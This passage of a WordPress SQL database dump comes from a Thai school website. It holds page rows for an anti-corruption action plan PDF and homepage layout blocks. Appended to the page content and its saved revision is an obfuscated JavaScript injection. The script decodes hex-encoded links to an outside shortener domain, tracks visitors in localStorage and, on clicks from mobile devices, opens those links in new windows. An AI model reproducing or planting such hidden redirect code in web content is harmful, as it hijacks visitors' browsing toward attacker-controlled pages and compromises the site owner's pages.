_0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนการปฏิบัติการป้องกันการทุจริต','','publish','closed','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%81%e0%b8%b1','','','2024-08-20 20:04:26','2024-08-20 13:04:26','',0,'http://pakhaeng.ssk.in.th/?page_id=1010',0,'page','',0),
(1011,1,'2024-08-20 20:04:15','2024-08-20 13:04:15','','แผนการปฏิบัติการป้องกันการทุจริต','','inherit','','closed','','%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%81%e0%b8%b1','','','2024-08-20 20:04:15','2024-08-20 13:04:15','',1010,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf',0,'attachment','application/pdf',0),
(1012,1,'2024-08-20 20:04:25','2024-08-20 13:04:25','<!-- wp:file {\"id\":1011,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"แผนการปฏิบัติการป้องกันการทุจริต\"></object><a id=\"wp-block-file--media-0b7a4c7d-36a3-486b-945f-2598993b26cd\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\">แผนการปฏิบัติการป้องกันการทุจริต</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/แผนการปฏิบัติการป้องกันการทุจริต.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-0b7a4c7d-36a3-486b-945f-2598993b26cd\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนการปฏิบัติการป้องกันการทุจริต','','inherit','closed','closed','','1010-revision-v1','','','2024-08-20 20:04:25','2024-08-20 13:04:25','',1010,'http://pakhaeng.ssk.in.th/?p=1012',0,'revision','',0),
(1013,1,'2024-08-20 20:04:44','2024-08-20 13:04:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 